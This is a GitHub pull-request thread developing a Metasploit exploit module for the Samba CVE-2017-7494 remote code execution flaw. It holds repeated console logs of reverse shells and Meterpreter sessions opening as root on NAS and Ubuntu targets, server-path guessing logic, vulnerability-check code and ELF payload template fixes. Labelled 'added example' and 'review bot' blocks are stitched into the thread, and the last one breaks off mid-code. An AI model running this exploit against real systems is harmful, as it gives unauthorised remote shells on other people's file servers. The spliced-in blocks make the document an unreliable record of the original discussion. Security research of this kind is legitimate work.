First crack at Samba CVE-2017-7494 #8450

Merged
merged 9 commits into from May 25, 2017

@hdm
Contributor

hdm commented May 25, 2017

This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an up to date Synology NAS and an Ubuntu 16.04 LTS x86_64 image. It needs testing against Linux ARMLE and Linux x86.

The default target is currently set to 2 (x86_64). Make sure to change this when testing other platforms.

Synology:

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Payload is stored in //192.168.0.41/Temp/ as OofdIcVi.so
[*] 192.168.0.41:445 - Trying location /volume1/OofdIcVi.so...
[*] 192.168.0.41:445 - Trying location /volume1/Temp/OofdIcVi.so...
[*] Command shell session 2 opened (192.168.0.3:4444 -> 192.168.0.41:41100) at 2017-05-24 19:40:33 -0500

id
uid=0(root) gid=0(root) groups=0(root),100(users)

Ubuntu 16.04:

msf exploit(is_known_pipename) > exploit 

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

The stuff left on my TODO for this (via additional PR if needed):

  • Look into other ways to exploit this without knowing the server-side path (/proc/self/cwd, etc)
  • Fingerprint specific OS configurations via blocking on FIFO pipe reads
  • Additional support for other architectures

It would be really neat if this could just cycle all possible architectures once it figured out a writeable path. If the module has trouble finding a writable path, you can specify it manually via SMB_SHARE_NAME, SMB_FOLDER, and SMB_SHARE_BASE.
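An added example (not the module's code) of the server-side path guessing the "Trying location" lines above show. The list of base directories and its order are taken from that output; the case-variant handling, the `base:` behaviour when SMB_SHARE_BASE is known, and the helper names are assumptions about the module's logic rather than code from the PR.

```ruby
# Added example, not the module's code: reconstructs from the output above how
# the server-side path of the uploaded .so is guessed. The base list and its
# order come from that output; the rest is an assumption about the logic.

# Filesystem roots under which NAS and Linux Samba installs usually export
# their shares, in the order the module output above probes them.
SHARE_BASES = %w[
  /volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media
  /var/samba /tmp /home
].freeze

# The on-disk directory may not match the share name's case (the output
# shows share, SHARE and Share being tried), so try each spelling once.
def share_name_variants(share)
  [share, share.downcase, share.upcase, share.capitalize].uniq
end

# Absolute paths at which a file written to \\host\share\folder\filename may
# sit on the server. When SMB_SHARE_BASE is known only that base is used
# (assumption: the real module may order these differently).
def candidate_paths(share, folder, filename, base: nil)
  bases = base ? [base] : SHARE_BASES
  bases.flat_map do |b|
    dirs = [b] + share_name_variants(share).map { |s| File.join(b, s) }
    dirs.map { |d| File.join(*[d, folder.to_s, filename].reject(&:empty?)) }
  end.uniq
end

# Probes candidates in order and returns the first path the server loaded.
# The block stands in for the SMB request that opens the path as a pipe
# name; it returns true once the payload connects back (the "Command shell
# session opened" line above) and false on an error such as the
# STATUS_OBJECT_NAME_NOT_FOUND seen in the Synology output.
def find_module_path(candidates)
  candidates.find { |path| yield(path) }
end

if $PROGRAM_NAME == __FILE__
  # Constructed walk-through: pretend share "Temp" is exported from /volume1.
  loaded_from = '/volume1/Temp/OofdIcVi.so'
  attempts = 0
  hit = find_module_path(candidate_paths('Temp', '', 'OofdIcVi.so')) do |path|
    attempts += 1
    path == loaded_from
  end
  puts "loaded #{hit} after #{attempts} probes"
end
```

With no base given the search space is 11 roots times the bare root plus three share spellings, 44 probes, each of which costs one pipe-open request; that is the cost the SMB_SHARE_BASE option avoids.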

@wvu-r7
Contributor

wvu-r7 commented May 25, 2017

Coincidentally, I think this resolves #7723. Double win.


@busterb
Contributor

busterb commented May 25, 2017

Nice, thanks for fixing the .so templates!


@h00die
Contributor

h00die commented May 25, 2017

Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 (update 3 is current, will test that in a minute)

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
@OJ
Contributor

OJ commented May 25, 2017

Scarily consistent output at my end too:

msf exploit(is_known_pipename) > run

[*] [2017.05.25-11:23:53] Started reverse TCP handler on <nope>:5555 
[*] [2017.05.25-11:23:54] <nope>:445 - Using location \\<nope>\<nope>\ for the path
[*] [2017.05.25-11:23:54] <nope>:445 - Payload is stored in //<nope>/<nope>/ as WDRFSUkE.so
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/WDRFSUkE.so...
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/<nope>/WDRFSUkE.so...
[*] Command shell session 2 opened (<nope>:5555 -> <nope>:40206) at 2017-05-25 11:23:54 +1000

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux NAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_1512+

👍

The module leaves the .so files behind on disk, I assume that cleanup isn't something that can happen until the session has finished, right?


@h00die
Contributor

h00die commented May 25, 2017

Same result after going fully up to date on mine (update 3).
I'll stab out some docs in a few min just so we're on the same page on what's been tested and confirmed and what hasn't.

Samba version 4.4.9, for the record.


@wwebb-r7
Contributor

wwebb-r7 commented May 25, 2017

No dice on an armle-based WD glorified-external-drive NAS. The module itself works just fine at first glance.

Sorry, my hostname is not very GH-friendly.

---:/shares/research# file /usr/sbin/samba_multicall 
/usr/sbin/samba_multicall: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0x2f0327768cf7edf270387fdb1380fcd64e99b666, not stripped
---:/shares/research# file eRoaKgKM.so 
eRoaKgKM.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
---:/shares/research# uname -a
Linux --- 3.2.26 #1 SMP Thu Jul 9 11:14:15 PDT 2015 wd-2.4-rel armv7l GNU/Linux
---:/shares/research# 

I have some more armle devices I can test later and actually debug it without going through an act of congress. Probably won't get around to that until tomorrow evening at best.


@h00die
Contributor

h00die commented May 25, 2017

module docs: hdm#15
@OJ need to know your DSM version and Samba version if it isn't a DSM already listed
@wwebb-r7 what version of Samba and what WD NAS OS is that?
@hdm need similar info on version numbers


@wvu-r7
Contributor

wvu-r7 commented May 25, 2017

Works right out of the box (no configuration) on Samba 4.1.13 on Ubuntu 15.04 (my exploit dev VM).

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Using location \\192.168.33.129\[redacted]\ for the path
[*] 192.168.33.129:445 - Payload is stored in //192.168.33.129/[redacted]/ as ITmrMclX.so
[*] 192.168.33.129:445 - Trying location /volume1/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/[redacted]/ITmrMclX.so...
[*] Sending stage (2849784 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:56646) at 2017-05-24 21:24:14 -0500

meterpreter > 

I did switch to Meterpreter (Mettle), though. :-)


@wvu-r7
Contributor

wvu-r7 commented May 25, 2017

Just updated!


@busterb
Contributor

busterb commented May 25, 2017

Tested template on an Ubuntu 17.04 chroot on an ARMv7 chromebook, similar results to above. Looks like an .so ABI mismatch:

bcook@localhost:/var/opt/bcook$ file /lib/arm-linux-gnueabihf/ld-2.24.so 
/lib/arm-linux-gnueabihf/ld-2.24.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=8b848f4f76562d20faf06ff375f30318c696fd82, stripped
bcook@localhost:/var/opt/bcook$ file /var/opt/bcook/QCwTHZfa.so 
/var/opt/bcook/QCwTHZfa.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
bcook@localhost:/var/opt/bcook$ LD_PRELOAD=/var/opt/bcook/QCwTHZfa.so /bin/true
ERROR: ld.so: object '/var/opt/bcook/QCwTHZfa.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

ii samba 2:4.4.5+dfsg-2ubuntu5.5 armhf SMB/CIFS file, print, and login server for Unix

I suspect we need to use EABI for the arm template, which is a lot more common these days than the original OABI spec. Might be nice if metasploit accounted for things like ABI specs, but for now we probably need to just go with most-common denominator.


@busterb
Contributor

busterb commented May 25, 2017

I guess we can consider 'armle' in metasploit equivalent to 'armel' and should be either EABI or OABI (still reading on differences). We could perhaps add an ARCH_ARMHF architecture as well for ARMv7+ EABI support.

https://wiki.embeddedarm.com/wiki/EABI_vs_OABI


@wwebb-r7
Contributor

wwebb-r7 commented May 25, 2017

Without explaining my network topology, I can't check right now. Sorry, getting a migraine or something similar.

I don't even have Linux on this laptop for more RE tools, but the ARM file trips up IDA as well.

illegal

Best effort I've got at the moment


@wvu-r7 wvu-r7 self-assigned this May 25, 2017

@nixawk
Contributor

nixawk commented May 25, 2017

Could we add a method to check vulnerable versions ?

def check
  # vulnerable version match
end

screen shot 2017-05-24 at 23 24 21

Bug Flow

  1. is_known_pipename (./source3/rpc_server/srv_pipe.c)
  2. smb_probe_module (./lib/util/modules.c)
  3. do_smb_load_module (./lib/util/modules.c)
  4. load_module (./lib/util/modules.c)
  5. dlopen
@bcoles
Contributor

bcoles commented May 25, 2017

@nixawk I don't see why not. Could also verify OS. Here's some spaghetti code using smb_fingerprint:

def check
  res = smb_fingerprint

  os = res['os']
  vprint_status("Operating System: #{os}")

  if os =~ /Windows/i
    vprint_status('Target operating system not supported')
    return CheckCode::Safe
  end

  # native_lm may be missing or not a Samba banner; to_s keeps the regex checks below nil-safe
  smb_version = res['native_lm'].to_s.scan(/Samba ([\d\.]+)/).flatten.first
  vprint_status("Samba version: #{smb_version}")

  # 3.x and 4.x branches affected
  if smb_version !~ /^[34]\./
    return CheckCode::Safe
  end

  # 3.x branch - versions prior to 3.5.0 are safe
  if smb_version =~ /^3\.[0-4]\./
    return CheckCode::Safe
  end

  # 4.x branch - patched in 4.4.14 / 4.5.10 / 4.6.4; 4.0 - 4.3 never received a fix
  # ([0-3]\.\d+ rather than [0-3]\. so that e.g. 4.1.13 is not reported as safe)
  if smb_version =~ /^4\./
    if smb_version !~ /^4\.([0-3]\.\d+|4\.[0-9]|4\.1[0-3]|5\.[0-9]|6\.[0-3])$/
      return CheckCode::Safe
    end
  end

  connect
  smb_login
  find_writeable_share_path
  disconnect

  if @share.to_s.eql?('')
    vprint_status('Could not find a writeable share')
    return CheckCode::Detected
  end

  vprint_status("Found writeable share: #{@share}")
  CheckCode::Appears
end
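An added example, not code from the module or from the comment above, doing the same version gate with Gem::Version ranges instead of regexes so that vendor suffixes ("Samba 4.3.11-Ubuntu") and multi-digit patch levels are handled. The fixed releases (4.4.14, 4.5.10, 4.6.4) and the "3.5.0 onwards" cut-off are the ones stated in this thread; the helper names, the symbolic verdicts standing in for CheckCode, and the sample banners are assumptions and constructed input.

```ruby
# Added example, not the module's code. Fixed releases and cut-off are those
# named in the thread; helper names and sample banners are assumptions.
require 'rubygems'

FIRST_AFFECTED = Gem::Version.new('3.5.0')
# Branch => first release carrying the fix. Branches before 4.4 were already
# end-of-life and never got one; branches from 4.7 on were cut after the fix.
FIXED_IN = {
  [4, 4] => Gem::Version.new('4.4.14'),
  [4, 5] => Gem::Version.new('4.5.10'),
  [4, 6] => Gem::Version.new('4.6.4'),
}.freeze
FIRST_UNAFFECTED_BRANCH = [4, 7].freeze

# Pulls the numeric version out of a NativeLM banner such as
# "Samba 4.3.11-Ubuntu"; returns nil for anything that is not Samba.
def samba_version(native_lm)
  m = native_lm.to_s.match(/\bSamba (\d+(?:\.\d+)+)/)
  m && Gem::Version.new(m[1])
end

# True when the version lies in an affected range: 3.5.0 up to, but not
# including, the fixed release of its branch (or the whole branch when it
# never got one), and nothing from 4.7 on.
def samba_vulnerable?(version)
  return false if version.nil? || version < FIRST_AFFECTED
  branch = version.segments[0, 2]
  return false if (branch <=> FIRST_UNAFFECTED_BRANCH) >= 0
  fixed = FIXED_IN[branch]
  fixed.nil? || version < fixed
end

# Banner-level verdict in the spirit of Metasploit's CheckCode values
# (symbols here so the example runs without the framework).
def banner_check(os, native_lm)
  return :safe if os.to_s =~ /Windows/i
  v = samba_version(native_lm)
  return :unknown if v.nil?
  samba_vulnerable?(v) ? :appears : :safe
end
```

The banner is only the first filter: as in the check above, the module still has to find a writeable share before a verdict stronger than Detected is justified, and vendor backports (a distribution patching its 4.3.x package in place) can make a banner-based Appears a false positive.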
@bcoles
Contributor

bcoles commented May 25, 2017

+1 for not working with ARM. Tested with QNAP NAS.

$ uname -a
Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown
$ smb2status
smbd (samba daemon) Version 4.4.9
@jhart-r7
Contributor

jhart-r7 commented May 25, 2017

@bcoles @nixawk , I've got a WIP commit that should help with the checking part of this. Coincidentally it is similar to @bcoles' POC.

#8452


@Medicean

Medicean commented May 25, 2017

Works right 👍 👍

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.35.197
RHOST => 192.168.35.197
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.35.197   yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   2   Linux x86_64


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.35.197:4444
[*] 192.168.35.197:445 - Using location \\192.168.35.197\share\ for the path
[*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
[*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
[*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

whoami
nobody

+
+phdrsize equ $ - phdr
+ dd 2 ; p_type = PT_DYNAMIC
+ dd 7 ; p_flags = rwx
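Review bot: the `dd 7 ; p_flags = rwx` word sits directly after `dd 2 ; p_type = PT_DYNAMIC`, which is the Elf64_Phdr layout; Elf32_Phdr orders its fields p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align, so in the 32-bit (x86 and ARMLE) templates this word belongs after p_memsz, matching the PT_LOAD entry this hunk's existing layout is compared against in the review comment. With p_flags in the wrong slot every later field shifts by four bytes and the dynamic linker reads the flags value as p_offset, which is enough for dlopen() to reject the object or map garbage.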

@timwr

timwr May 25, 2017

Contributor

p_flags needs to move to after p_memsz (like in the PT_LOAD section)

@hdm

hdm May 25, 2017

Contributor

Have you tested with this change?

@timwr

timwr May 25, 2017

Contributor

I'm struggling to get a decent test environment set up. I can test with LD_PRELOAD on Android and Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armv5tejl GNU/Linux. Neither is working for me (even after this change).

@Marin111

Marin111 May 25, 2017

For CentOS 6.5 it's not successful.

@xmycroftx

xmycroftx May 25, 2017

OS X uses SMBX, which supposedly happened to avoid smb3 (GPLv3). Worth a test though.

@hdm

hdm May 25, 2017

Contributor

Thanks folks! Sounds like we need to:

  • Fix ARMLE support
  • Look into Mac OS X support
  • Delete the .so after the module completes

Additionally, Mr. Tavis Ormandy suggested a nice way to exploit this without knowing the path using two connections and /proc/self/cwd, which I will try to implement in the near future (this PR if it's languishing, or the next one).

I would love some help for ARMLE, MIPS, and OS X (for .so templates).

@bcoles

bcoles May 25, 2017

Contributor

@hiw0rld do you have a stack trace? I don't see .dup used anywhere in this PR.

@busterb

busterb May 25, 2017

Contributor

Dear spectators - a pull request is a work-in-progress. If you do not know how to debug problems, pull code into your branch, or to expect some rough edges, then please abstain from commenting until this pull request has been merged. Otherwise it becomes noise that simply slows down progress. Thanks!

@tsellers-r7

tsellers-r7 May 25, 2017

@bcoles @hdm @wvu-r7

FYI, if you implement vulnerability checking please keep in mind that at least some versions of Samba include Windows in the Native OS value.

For example, on Kali with Samba 4.5.6 installed:

user@kali:~$ smbd --version
Version 4.5.6-Debian

Wireshark image:
screen shot 2017-05-25 at 8 39 21 am

Reference:
https://github.com/samba-team/samba/blob/aa43d0d81baa497135a17e843b05336b4a504809/source3/smbd/sesssetup.c#L50

Looks like this was changed from Unix to Windows in January 2014, released in 4.1.12 or 4.1.13 (I think):
samba-team/samba@666948c

@egypt

egypt May 25, 2017

Contributor

@tsellers-r7 ugh, that's super annoying. Thanks for spotting it.
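Because newer Samba advertises "Windows 6.1" as its Native OS, a version check has to key off the NativeLanMan / Server string instead ("Samba 4.5.6-Debian" in the capture tsellers-r7 posted). The block below is an added example in Ruby and is not part of the is_known_pipename module or of Metasploit. The fixed release numbers are taken from the Samba advisory for CVE-2017-7494 (4.6.4, 4.5.10 and 4.4.14, with 3.5.0 the first affected release); the function names and the sample session-setup fields are constructed for illustration.

```ruby
# Added example, not part of the is_known_pipename module or of Metasploit.
# It derives a CVE-2017-7494 verdict from the "Samba x.y.z" string that smbd
# returns in the NativeLanMan field of its Session Setup response, rather than
# from NativeOS, which newer Samba fills with "Windows 6.1".
#
# Fixed releases per the Samba advisory: 4.6.4, 4.5.10 and 4.4.14; every
# release from 3.5.0 up to those is affected. Branches older than 4.4 received
# no upstream fix; branches from 4.7 on shipped with it.
FIRST_AFFECTED = [3, 5, 0].freeze
FIXED_PATCH_LEVEL = { [4, 4] => 14, [4, 5] => 10, [4, 6] => 4 }.freeze

# Pull [major, minor, patch] out of a NativeLanMan string such as
# "Samba 4.3.11-Ubuntu"; nil when the string does not name a Samba version.
def samba_version(lanman)
  m = /\bSamba\s+(\d+)\.(\d+)\.(\d+)/.match(lanman.to_s)
  m && m.captures.map(&:to_i)
end

# :affected, :not_affected or :unknown, judged on the upstream version only.
# Distribution backports keep the old number (Ubuntu's
# 2:4.3.11+dfsg-0ubuntu0.16.04.7 still reports 4.3.11), so :affected means
# "upstream version affected", not a confirmed hit.
def cve_2017_7494_status(lanman)
  v = samba_version(lanman)
  return :unknown unless v
  return :not_affected if (v <=> FIRST_AFFECTED) < 0

  branch = v[0, 2]
  fixed = FIXED_PATCH_LEVEL[branch]
  if fixed
    v[2] < fixed ? :affected : :not_affected
  elsif (branch <=> [4, 4]) < 0
    :affected
  else
    :not_affected
  end
end

# Constructed Session Setup response fields (assumed values, not captured from
# any host in this thread).
SAMPLE_RESPONSES = [
  { host: '10.0.0.5', native_os: 'Windows 6.1', native_lm: 'Samba 4.5.6-Debian' },
  { host: '10.0.0.6', native_os: 'Unix', native_lm: 'Samba 3.6.25' },
  { host: '10.0.0.7', native_os: 'Windows 6.1', native_lm: 'Samba 4.6.4' },
  { host: '10.0.0.8', native_os: 'Windows Server 2012 R2 9600',
    native_lm: 'Windows Server 2012 R2 6.3' }
].freeze

# Map host => { status:, native_os:, version: }. NativeOS is reported but
# never used for the verdict, so the "Windows 6.1" trap stays visible.
def triage(responses)
  responses.each_with_object({}) do |r, out|
    out[r[:host]] = { status: cve_2017_7494_status(r[:native_lm]),
                      native_os: r[:native_os],
                      version: samba_version(r[:native_lm]) }
  end
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_RESPONSES).each do |host, info|
    puts format('%-10s %-13s NativeOS=%-30s version=%s',
                host, info[:status], info[:native_os], info[:version].inspect)
  end
end
```

The verdict is "upstream version affected", not "exploitable": distributions backport the fix without bumping the version (this thread has 4.3.11-Ubuntu on both sides of the patch), and the advisory's workaround, `nt pipe support = no` in the [global] section of smb.conf, is invisible to any banner check. Treat :affected as a prompt to verify actively, not as a result.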

@hdm

hdm May 25, 2017

Contributor

Tested versions here (x86_64):

  • Ubuntu 16.04 with Samba 4.3.11 (2:4.3.11+dfsg-0ubuntu0.16.04.6)
  • Synology NAS DS2415+ running DSM 6.1-15047 Update 1 and Samba 4.3.11

@fupinglee

fupinglee May 25, 2017

@michelep I tested successfully:
samba 4.3.11-Ubuntu
ubuntu 16.04.2
You can see it in this blog:
http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/

@mzpqnxow

mzpqnxow May 25, 2017

@busterb I have a toolchain (or had a toolchain) for armel oabi if that helps... what a pain shellcode for that was :/

@mzpqnxow

mzpqnxow May 25, 2017

@hdm I can build .so for a wide range of mips/mipsel (several abis/formats) and armel oabi I just need the .c for the .so

@hdm

hdm May 25, 2017

Contributor

@Mzack9999 we're hoping to use the same .s ELF templates for all platforms (data/template/src/elf/dll/*.s); the MIPSLE may be identical to ARMLE, but MIPSBE needs some changes for the endian swap. ARM64 would be nice as well.

@mzpqnxow

mzpqnxow May 25, 2017

Oh, I misunderstood, so this doesn't need a cross-compiler at all, does it? Just nasm (or objcopy, or whatever) to create a blank shared library? Admittedly I didn't read what this shared library was actually for, but it appears it is a skeleton ELF file with no actual assembly code... so I probably have nothing to offer.

@mzpqnxow

mzpqnxow May 25, 2017

I will take a shot if I have time, but you will need a separate file for each arch as far as I can tell:

dw 62 ; e_machine = EM_X86_64

@mzpqnxow

mzpqnxow May 25, 2017

Or perhaps you meant this should be done in some templating language, in which case I am not familiar enough with Ruby nor whichever templating language Metasploit is using to be able to produce such a thing. I can give you raw dumps of .so files for each platform you're interested in and/or the raw field values themselves
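The two template pitfalls raised in this thread, p_flags landing after p_memsz only in 32-bit program headers (timwr's review note) and a separate e_machine and byte order per architecture (the exchange above), are easiest to catch by decoding the skeleton with the struct layout its own e_ident bytes select. The following is an added example in Ruby and is not code from the PR or from Metasploit; `elf_layout`, `check_template` and `build_skeleton` are names chosen here, the sample headers they produce are constructed, and nothing is assumed about the real data/template/src/elf/dll/*.s files beyond the ELF specification.

```ruby
# Added example, not code from this PR or from Metasploit: a sanity checker
# for hand-assembled ELF shared-object skeletons. It decodes the ELF header
# and program headers with the layout chosen by the file's own EI_CLASS and
# EI_DATA bytes: Elf32_Phdr carries p_flags after p_memsz, Elf64_Phdr right
# after p_type, and a big-endian target (MIPSBE) swaps every multi-byte field.
ELF_MAGIC = "\x7fELF".b
ET_DYN = 3
PT_LOAD = 1
PT_DYNAMIC = 2
PF_X = 1
PF_W = 2
PF_R = 4
# e_machine values from the ELF specification
MACHINES = { 3 => 'EM_386', 8 => 'EM_MIPS', 40 => 'EM_ARM',
             62 => 'EM_X86_64', 183 => 'EM_AARCH64' }.freeze

# String#unpack formats for the header after e_ident and for one program
# header, by class (1 = ELF32, 2 = ELF64) and byte order.
def elf_layout(cls, big)
  h = big ? 'n' : 'v'     # 16-bit
  w = big ? 'N' : 'V'     # 32-bit
  q = big ? 'Q>' : 'Q<'   # 64-bit
  if cls == 1
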